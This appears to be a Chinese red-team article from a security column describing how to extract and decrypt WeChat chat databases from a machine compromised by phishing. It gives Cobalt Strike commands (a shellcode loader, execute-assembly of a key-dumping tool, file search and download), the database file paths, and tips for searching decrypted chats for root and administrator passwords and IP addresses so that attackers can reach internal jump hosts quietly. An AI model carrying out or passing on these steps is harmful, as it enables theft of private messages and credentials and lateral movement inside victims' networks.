钓鱼场景下微信聊天记录回传

一、使用场景

钓鱼攻击（通过钓鱼 / 微信控到的机器通常都是登录状态）

渗透到运维机器（有些运维机器会日常登录自己的微信）

实战中钓鱼时常在微信聊天记录中找到目标内网系统账号、机器账号密码，尽可能的不触发大量扫描告警下在内网中精准打到跳板机。

二、获取微信聊天记录过程

在第一步需要用到，Sharp-dumpkey工具，下面对Sharp-dumpkey工具进行介绍：

基于C#实现的获取微信数据库密钥的小工具，可配合chatViewTool使用。可直接执行命令.dumpkey.exe,查看微信数据库密钥，并回传DBpass.bin文件中。

• • 暂时不支持微信多开场景的密钥获取。

• • 需微信登录后才可抓取密钥。

• • 程序未采用动态获取基址的方式，因此为保证程序可用性，运行时会在线拉取基址。

在被获取权限PC端执行 .co.exe shellcode -f .cece.txt，可连接到CS服务器

在被获取权限PC处，右键选择Interact，可进入命令执行

1、获取微信数据库密钥，执行命令execute-assembly C:UserssummerDesktoptestdumpkey.exe

回传 DBpass.bin，该文件中记录了微信数据库密钥

2、下载目标聊天数据库文件，默认保存目录在以下目录，超出 240MB 会自动生成 MSG1.db，以此类推。

C:UserssummerDocumentsWeChat Fileswxid_vd0nxyv6n20t22MsgMultiMSG0.db C:UserssummerDocumentsWeChat Fileswxid_vd0nxyv6n20t22MsgMicroMsg.db

备注： MSG0.db文件存放聊天记录 MicroMsg.db文件存放好友列表

执行命令shell C:UserssummerDesktoptestFileSearch.exe search C: MSG，可找到文件MSG0.

连接被获取权限PC的文件夹，找到目录C:UserssummerDocumentsWeChat Fileswxid_vd0nxyv6n20t22MsgMulti，下载文件MSG0.db并存放到自定义目录即可

找到目录C:UserssummerDocumentsWeChat Fileswxid_vd0nxyv6n20t22Msg，下载文件MicroMsg.db并存放到自定义目录（与MSG0.db放到同一目录下）

在第3步之前对ChatViewTool工具进行介绍：

ChatViewTool是一个配合dumpkey(微信数据库秘钥获取工具)使用的小工具，该工具实现了微信数据库解密以及展示数据库聊天记录的功能。

使用方法 在获取数据库秘钥之后将内容保存为文本文件DBPass.Bin，随后提取以下相关的数据库放于秘钥文件同目录。C:UserssummerDocumentsWeChat Fileswxid_vd0nxyv6n20t22MsgMultiMSG0.db

C:UserssummerDocumentsWeChat Fileswxid_vd0nxyv6n20t22MsgMicroMsg.db

随后打开ChatViewTool点击“数据库解密”并选择秘钥及数据库所在的目录，待解密完成后

点击“查看数据库”选择同目录即可完成会话展示，双击联系人列表可展示对应的聊天记录

3、将上面DBpass.bin、MSG0.db、MicroMsg.db三个文件回传到同目录，配合 ChatViewTool 打开解密即可查看，在搜索处 “administrator” “root” “密码” “ip 等”，项目地址。

三、下载

本文作者：TideSec

本文为安全脉搏专栏作者发布，转载请注明：https://www.secpulse.com/archives/199362.html